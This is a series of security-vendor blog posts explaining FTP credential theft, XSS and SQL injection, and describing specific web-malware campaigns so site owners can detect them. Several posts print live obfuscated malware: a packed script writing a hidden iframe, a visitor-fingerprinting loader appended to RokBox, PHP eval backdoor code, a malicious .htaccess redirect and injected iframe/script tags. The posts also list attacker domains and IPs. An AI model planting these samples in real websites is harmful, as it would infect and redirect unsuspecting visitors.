This is the third part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

In this article, we will describe one of the most common reasons why benign websites are hacked and then are infected with malware: FTP password compromise. This particular technique is neither very sophisticated, nor is it recent, nonetheless, it is extremely effective.

It is estimated that near 30% of all websites that are injected with malicious computer code are the result of stolen credentials, such as FTP passwords. We will delve into some detail about FTP, how to protect yourself and your website from this kind of an attack, and alternate best practice strategies.

What is FTP?
File Transfer Protocol (FTP) is a protocol that specifies how to communicate with a computer, such as a web server, in order to access to the files on that computer. FTP is simply a set of rules according to which your computer can talk to a file server, web server or other computers and reliably exchange information.

This protocol, FTP, is based on another popular Internet protocol called Transmission Control Protocol (TCP). FTP is based on a client server model, wherein the computer that requests data is the client, and the computer supplying the data is the server. Both client and server understand how to “talk” to each other reliably using FTP.

How is FTP used?
FTP can be used for a number of purposes, one of the primary uses being for web-masters to upload web pages to web-servers. FTP in general can be used to easily move files from one computer to another. Academic institutions also use FTP to move large data files from experiments onto dedicated computers meant for storing information.

What is a code injection attack?
A code injection attack is an unwarranted effort to load malicious computer code onto a website, by exploiting weaknesses in the software that is powering the website or by other means, such as compromised passwords (FTP etc).

This attack usually manifests itself when a malicious hacker identifies a particular weakness in the way a website handles user input and exploits that weakness to load the malicious computer code, infecting the web pages on the website. This allows the malicious hacker to (1) steal information from the compromised website (2) infect visitors visiting the compromised website and more.

How do FTP credentials get compromised?
Credentials, such as FTP username and passwords, can be compromised by Trojans and viruses installed on the computers of unsuspecting users “sniff” the credentials being transferred over the Internet to the web server. FTP transfers credentials and information in clear-text. This means that any person or program that is “listening” in on the transmission of credentials to the FTP server, can do so relatively easily and then steal these credentials.

There is extensive literature on rootkits, sniffing software, and key loggers on the Internet. A popular Trojan called ZBot was analyzed by Prevx and details were released in this forum entry. This particular Trojan is installed from a number of vectors: Rogue Antivirus advertisements, spam emails, fake codecs, and more. This Trojan is very effective at stealing FTP credentials and passing them to a “master” server that injects malware onto the associated websites.

How are the FTP credentials used to infect websites?
Once a Trojan like the one described above acquires FTP credentials, they pass on the information to a master server called a “command and control” server. This command and control server could be present on an IRC chat channel, for example. Once the Trojan has stolen the credentials and notified the master server via the chat channel (automatically), the master server uses the credentials to infect the website with malware.

How to detect if your site is vulnerable to FTP credential compromise attacks?
If you use FTP for access to files on your website, you need to be very careful. If you store your FTP usernames and passwords on your local computer using software like FileZilla, your website can be compromised if malicious software or a Trojan is installed on your computer. Never store credentials on your local computer.

Additionally, you should use SFTP (Secure FTP), SSH (Secure Shell), or SCP (Secure Copy), which uses encryption, instead of FTP. Or, use another method that does not transfer credential information to your server in clear-text (using encryption instead) when communicating with your web server. This technique will avoid credential compromise from “sniffing” attacks.

Conclusion
FTP credential compromise is a common vector for malicious hackers to exploit and infect websites. We have seen what FTP is, how it is exploited by hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

News, Report blackisting, ftp, malware, passwords, sniffing, trojan

This is the second part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

This time, we will discuss one of the most prolific techniques used to compromise millions of websites: Cross Site Scripting. Cross Site Scripting attacks have been seen for many years now and remains a continuing threat. In fact, by the latest statistics, more than 75% of websites have at least one Cross Site Scripting vulnerability.

It is no wonder that thousands of sites are compromised every single day, only to infect their unsuspecting visitors and end up on blacklists. In this article, we will delve into detail on Cross Site Scripting, how to identify vulnerabilities, how to stop them from being exploited, and more.

What is Cross Site Scripting?
Cross Site Scripting is a an attack wherein a hacker exploits vulnerabilities in the software powering a website to launch an attack on the user. The attack can range from the display of a fake Anti-Virus advertisement to an unsuspecting user, all the way to a sophisticated port scan run using an injected toolkit.

Cross Site Scripting is primarily used to forward users to a URL that looks genuine, and is in fact pointing to a legitimate business website. However, when the user visits the URL in a browser, the content displayed is from a malicious source that can compromise and infect the visitor.

An important point to understand: Cross Site Scripting is not the same as Phishing. Phishing is the attempt to deceive someone that a web page actually belongs to a bank (or a similarly important institution), when it does not, in order to steal credentials.

Cross Site Scripting attacks direct users to a legitimate website with malicious content loaded from malicious sources. Cross Site Scripting attacks help hackers set up phishing campaigns and can be used as a tool to enable these malicious activities.

What is XSS?
XSS is an abbreviation for Cross Site Scripting. Some people also refer to Cross Site Scripting as CSS, though this conflicts with the more popular abbreviation of CSS, Cascading Style Sheets, a widely used term in web technology. XSS is less ambiguous abbreviation for Cross Site Scripting.

What is a code injection attack?
A code injection attack is an unwarranted effort to load malicious computer code onto a website, by exploiting weaknesses in the software that is powering the website or by other means, such as compromised passwords (FTP etc).

This attack usually manifests itself when a malicious hacker identifies a particular weakness in the way a website handles user input and exploits that weakness to load the malicious computer code, infecting the web pages on the website. This allows the malicious hacker to (1) steal information from the compromised website (2) infect visitors visiting the compromised website and more.

What kind of vulnerabilities allow XSS attacks to happen?
XSS attacks occur primarily due to improper sanitization of user input. Consider the case where a hypothetical website has a form on a webpage that accepts a user’s email address to send a newsletter to them.

The web application that process the email address might not have been well constructed. Due to defects in the computer code that accepts the input from the user and processes it, a hacker may be able to run their own malicious computer code. It is very important to ensure that user input is not trusted implicitly. Validation must be performed on all user input to verify that the data is benign.

What are the major types of XSS attacks?
There are two primary types of XSS attacks: Persistent XSS and Reflected XSS. Persistent XSS attacks lead to the injection of malware onto the webpages of a weakly secured website where it is stored. Reflected XSS attacks are often used to make the weakly protected website act as a vehicle for malicious actions, while there is no real malware stored on the webpages (hence the name reflected).

Persistent XSS Attack Example
A malicious hacker realizes that an input form, such as a password field is not properly sanitizing its input, tries to exploit it, succeeds and then is able to permanently store malware on the website by infecting its webpages.

Consider that the input form might be expecting the user to provide an email address for a newsletter subscription, but the hacker puts in a email address and then also attaches computer commands to the email address. Weakly secured code in the web application analyzes this input, stores the email address, and then runs the other commands that the hacker included. This can allow the hacker to load malware onto the webpages.

Reflected XSS Attack Example
A malicious hacker identifies the various fields accepted as user input and attaches malicious commands as the values to be submitted for some or all of the fields in order to cause the web server to display (reflect) the malware back to the unsuspecting user who clicked the malware laced link.

In this scenario, the malware is self-contained inside a HTTP link. This attack succeeds since most users are used to clicking on link URLs without checking the actual contents of the URL. Malicious hackers are banking on this. These malicious links can be distributed via email, and once a user clicks on the link, the web server of the legitimate, but insecure website, is used to display the malware contained in the link to the user via the browser that the user is using to view the malicious link.

Another XSS Attack Example
Consider a website that has URLs of the following type:

http://www.yoursite.com/index.html?name=Alex

Let us say the parameter “name” is used to define name values for the user. The website uses this value to say “Hello Alex” on the webpage. In this example, a malicious hacker can exploit the parameter “name” by attaching malware information to the parameter “name” instead of the expected name as below:

http://www.yoursite.com/index.html?name=<script>alert('XSS vulnerability')</script>

This shows a message box to the user displaying the words ‘XSS vulnerability’, but in reality, actual malware code could have been loaded via this exploit on a website employing the same technique.

This attack succeeds because the web application that analyzes this URL and powers the website, incorrectly trusts the user to always input safe data. It is not be prepared for threats like this. In this case, a malicious hacker has used a benign website to launch a malware attack on an unsuspecting customer, and the website owner usually has no idea that his or her website was exploited.

How to detect if your site is vulnerable to XSS attacks?
There are many ways to check if your website is vulnerable to XSS attacks:

1. Find out if any of the software powering your website takes user input directly and uses it directly, without sanitizing it. For example: can a user attach a semicolon, colon, or bracket symbol in the text they are providing to the website as input, and have these special characters displayed back to them un-escaped?
2. Find out if the software that powers your website is out of date. If it is, apply all recommended patches or upgrade to the latest version of the software.
3. Find out if the third party plugins that your website employs, are at risk to XSS attack vulnerabilities.
4. Conduct a vulnerability assessment scan of your website to find out if there are any XSS vulnerabilities that are identified. Any vulnerabilities should be fixed as soon as possible.
5. Use a Web Application Firewall (WAF) and a Firewall to prevent malicious access to the website.

Conclusion
XSS is a popular vector for malicious hackers to exploit and infect websites. We have seen what XSS is, how it is used by hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you want to protect your website right now visit our services page.

Report, Security cross site scripting, malware, scripts, securityvulnerability, XSS

Website security is an arms race. Malicious hackers modify their methods constantly to infect benign and legitimate websites with web-malware. One of the most common techniques used to compromise millions of websites is called SQL Injection.

SQL injection attacks have been making headlines increasingly in the past few months. This highlights the sorry state of security practices and poorly implemented websites. In this article we will delve into detail about SQL injection, how to identify vulnerabilities, how to stop them from being exploited and more.

What is SQL?
SQL is an abbreviation for Structured Query Language. SQL is a computer programming language that is used to interact with software called databases. These databases are containers of information. The information can range from home addresses, usernames and passwords to social security numbers, entire movies and more.

• SQL is well described in its Wikipedia entry .

Why do we need SQL?
Programmers and software need to use SQL in order to interact with information stored in databases. SQL is a standardized way to ask questions and retrieve results from a database.

SQL also allows for questions (also called queries) asked of a database to be optimized in a manner that speeds up their processing and provides the answer faster. Thereby, SQL is a very important tool for interacting with data storage systems, like databases, if you would want to store or retrieve information easily, reliably and quickly.

Why does my website use SQL?
SQL allows a website to become “dynamic.” A website no longer needs to be a collection of “static” webpages. SQL allows webpages to store and display user information such as: usernames, passwords, addresses, credit card numbers and much more.

Visitors can now not only read information on the webpages, but can also interact with the website by storing information about themselves. This information stored in databases can be used to provide a customized experience for the website visitors. A good example of the functionality a website gains by the use of SQL and databases, is allowing users to create a personal account on the website, like Google or Facebook.

What is a code injection attack?
A code injection attack is basically an unwanted request for a website to run malicious computer code. These attacks succeed by exploiting weaknesses in the software that is powering the website or by other means, such as compromised passwords (FTP).

This kind of an attack usually starts when a malicious hacker identifies a weakness in the way a website handles user input and exploits that weakness to run malicious computer code, in order to infect (maliciously change content) the web pages on the website. This could allow the malicious hacker to (1) steal information from the compromised website (2) infect the visitor viewing the compromised website and more.

What vulnerabilities lead to SQL Injection attacks?
There are many reasons why an SQL Injection attack becomes successful. One of the primary reasons is that website developers often forget that they should never trust user input. Forgetting this rule of thumb has severe consequences.

SQL injection attacks primarily succeed when the programs powering website forms (a form is any area on a website that accepts user input, like a username and password box) use the data provided by the visitor directly in their SQL queries to a database. This is dangerous.

Malicious hackers can exploit mistake, “injecting” malicious input, unexpected by the computer code powering the website, to change the SQL query into a malicious one that may request valuable or sensitive information from the database instead of what the original author intended.

An example of SQL Injection
Consider the relatively recent spate of attacks on millions of websites that led to the injection of the following code:

<script src="hxxp://lilupophilupop.com/

• We have blogged extensively about the lizamoon attacks.

Is your site vulnerable to SQL injection?
There are many ways to check if your website is vulnerable to SQL Injection.

1. Determine if the code powering your website takes user input directly to create an SQL query. If so, you should modify this behavior immediately.
2. Find out if the software that powers your website is out of date. If it is, apply all recommended patches or upgrade to the latest version of the software.
3. Find out if the third party plugins that your website uses, for example those used to dynamically resize images etc., have SQL injection vulnerabilities.
4. Conduct a vulnerability assessment scan of your website to find additional SQL Injection vulnerabilities. Fix any you find as soon as possible.

Protect your site from SQL injection
You can protect your website from SQL Injection attacks by taking the following precautions:

1. Make sure that the software powering your website does not trust user input blindly. If you wrote it yourself, you need to sanitize user input and never use this input directly to form SQL statements or query a database.
2. Make sure all application software like WordPress, CMSs, and third party plugins are updated to the latest version and are fully patched.
3. Make sure you identify all SQL injection vulnerabilities on your website using vulnerability scans.
4. Use a Web Application Firewall (WAF) and a network firewall to prevent malicious access to the website.

Conclusion
SQL injection is a popular vector for malicious hackers to exploit and infect websites. We have seen what SQL injection is, how it is used by hackers and how to protect your website.

StopTheHacker.com customers have access to resources that protect against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Report, Security lizamoon, malware, sql injection

Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

How do I identify the malicious code?
A new strain of web malware has been making the rounds in the last few months. This particular infection has been nicknamed Chickenkiller. It is usually found with associated JavaScript obfuscated using the Dean Edwards Packer program.

An example is present below:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k1){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1)}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));

This de-obfuscated code is easier to read:

function hDcd(data) {
        var b16_digits = "0123456789abcdef";
        var b16_map = new Array;
        for (var i = 0; i < 256; i++) {
            b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
        }
        if (!data.match(/^[a-f0-9]*$/i)) {
            return false;
        }
        if (data.length % 2) {
            data = "0" + data;
        }
        var ll = data.length;
        var result = new Array;
        var j = 0;
        for (var i = 0; i < ll; i += 2) {
            result[j++] = b16_map[data.substr(i, 2)];
        }
        return result.join("");
    }

    if (document.cookie.indexOf("cookieh=enabled") == -1) {
        document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
        document.cookie = "cookieh=enabled";
    }

Which sites are aiding the attack?
The malicious links associated with the “packed” JavaScript code are listed below.

hxxp://chicknercx43.chickenkiller.com/i.php?go=1
hxxp://zxr0.chickenkiller.com/kat3/gate.php
hxxp://bugs.chickenkiller.com:10/images/1.htm
hxxp://peacockog45g45.chickenkiller.com/

These links all resolve back to a single IP address. As you can see, the IP address and host were created with a malicious intent. It is an example of a site that has been deployed specifically to spread malware.

IP address:	77.232.70.33
Hostname:	bl4ckh4x0rs.com

The malware has infected many sites including those below.

phislin.com
827512.com
jinti.com
cnad.com
siwayishu.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security dean edwards packaer, iframe, malware, packer

Today’s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one’s website through vulnerabilities in the plugin itself.

A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

What does a third party plugin do?
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

What is RokBox?
According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

More details about RokBox: Joomla Extensions – RokBox.

How do I identify the malicious code?
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia.

A sample of the actual malware is shown below:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

A sample of the benign RokBox code is shown below:

/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};

Is my site infected?
To find out if your site is infected, search for the strings “_0xdc8d”, “refurl”, and “\x63″ all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is a good practice to change all your access passwords as well to ensure your security.

How should I protect my site
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklist, javascript, Joomla, malware, rokbox, RokBox.js, Wordpress

In the recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors of legitimate, benign, sites compromised by malicious hackers. We will discuss the details of these distribution sites in our post.

Is my site infected?
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/

We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.

Which sites are aiding the attack?
The list below includes sites participating in the distribution of the malware thus far.

www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklisting, domboware, dragosimport, malware

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

• osCommerce Remote Edit Site Info Vulnerability
• osCommerce Online Merchant v2.2 File Disclosure And Admin ByPass

These exploits are used to infect benign, legitimate, sites. Once the malware is injected onto these exploited sites, the visitors to these sites are infected by various mechanisms used to install the malware on the visitors machine. Some of the mechanisms used to infect the visitors computer involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another indication of infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised or not.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).

Which sites are aiding the attack?
The below list includes sites used to spread the malware thus far.

hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/

Who owns these malicious sites?
The registrant for the malware disctibution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklisting, iframe, javascript, malware, willysy

Malicious hackers are continuously changing the tactics they use to compromise websites. Over 6,600 new websites are hacked and blacklisted every day and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.

One of the primary mechanisms used to infect visitors to a website is insertion of malicious code into a file called “.htaccess”. Hackers use this mechanism to infect benign and insecure websites.

About the attack
Websites are powered by a type of software called a “web server”. There are many different web servers, including IIS, NGINX, and others, with the most popular being Apache. Many web servers have a special per-directory configuration file: on Apache this file is called “.htaccess”. This file can specify rules that determine how and to whom your website should be visible.

Using this file hackers can even redirect your visitors to another website. Sometimes before inserting the malicious code inside this file, hackers will put in a large number of empty lines to make it harder to find. Make sure to check the complete “.htaccess” file for malware, not just the lines at the top.

Where are visitors redirected?
The following malicious websites have been used in this kind of redirection attack in the past few weeks. Visitors to benign, legitimate websites that have been compromised are often redirected to the malicious websites in the list below.

aquarigger
911docs
thefreeadforum
hqa-traffic
twilightparadox
googlexstat
pomorze
lixstats
legenica

How do I identify the malicious code
Malicious code in a “.htaccess” file usually looks similar to the example below. Notice the “RewriteRule” statement that tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site matching the “RewriteCond” statements.

This means visitors from many different search engines, including Ask, Google, MSN, and more, would be redirected to the malicious website.

<ifmodule>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
</ifmodule>

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security htaccess, malware, redirection

Simple Machines is a forum software used by thousands of website owners around the world to build online communities into their websites. Unfortunately, it is a perfect target for malicious hackers too. Finding a way to compromise the Simple Machines installation to inject malware into a legitimate website thereby infecting its visitors is an attractive proposition for malicious hackers.

This post will detail a fast-growing new strain of malware that has targeted Simple Machines enabled websites. At the time of posting, close to 30,000 websites have been infected with this malware. We detail the attack below.

The malware
This malware is primarily found in the form of a script element that contains the various commands to infect the website visitor.

Interestingly, this malware also creates an Iframe element that loads additional malware from an external website. Notice the Iframe element at the end of the sample below (this creates a link to m-e.crossfitharlem.net).

Malware sample (JavaScript):

<script>b=new function(){return 2;};try{app[1][2]}catch(q){ss="";}try{gberbger-2;}catch(q){s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd='e';if('e'==={}.asd)a=document['createTextNode']('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.
5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.
5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.
5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.
5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.
